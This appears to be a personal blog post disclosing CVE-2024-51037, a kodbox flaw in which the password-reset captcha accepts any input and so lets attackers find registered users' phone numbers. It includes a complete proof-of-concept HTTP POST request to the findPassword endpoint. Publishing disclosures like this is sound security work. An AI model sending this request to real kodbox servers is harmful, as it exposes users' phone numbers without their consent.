Tommonkey

All greatness comes from a brave beginning

0%

CVE-2024-51037_Disclosed

发表于 更新于 分类于

kodbox v.1.52.04 and before allows a remote attacker to obtain sensitive information via the captcha feature in the password reset function.

Vulnerability Type

Incorrect Access Control

Vendor of Product

1
https://github.com/kalcaddle/kodbox

Affected Product Code Base

kodbox - <=1.52.04

Affected Component

The password reset function’s captcha feature is malfunctioning, allowing attackers to pass the verification with any captcha input. Exploiting this vulnerability, an attacker can identify registered users’ phone numbers based on the response message

POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
POST /?user/index/findPassword HTTP/1.0
Host: *****.com
Cookie: KOD_SESSION_ID=23092fc6598c0272f492e3dbf5374777; CSRF_TOKEN=duGCGZM93X5Gj8Wv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 41
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

type=phone&input=phone&msgCode=code
奖励作者买杯可乐?